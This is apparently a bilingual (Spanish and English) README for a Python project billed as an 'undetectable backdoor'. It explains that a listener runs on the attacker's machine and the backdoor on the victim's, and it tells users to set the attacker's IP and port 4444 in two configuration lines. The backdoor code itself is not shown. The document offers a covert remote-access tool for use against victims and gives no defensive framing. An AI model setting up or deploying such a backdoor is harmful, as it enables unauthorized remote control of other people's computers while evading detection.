Backdoor indetectable escrito en Python
El archivo listener.py se ejecuta en la maquina atacante y en archivo backdoor en la maquina victima.
Para que funcione deben modificar el codigo al final de ambos archivos y agregar la IP de la maquina atacante en ambos.
Remplazen "0.0.0.0" por la IP del atacante
my_listener = Listener("0.0.0.0", 4444)
my_backdoor = Backdoor("0.0.0.0", 4444)
Undetectable backdoor written in Python
The file listener.py is executed on the attacking machine and in the backdoor file in the victim machine.
In order for it to work you must modify the code at the end of both files and add the IP of the attacking machine on both.
Replace "0.0.0.0" with the attacker's IP
my_listener = Listener("0.0.0.0", 4444)
my_backdoor = Backdoor("0.0.0.0", 4444)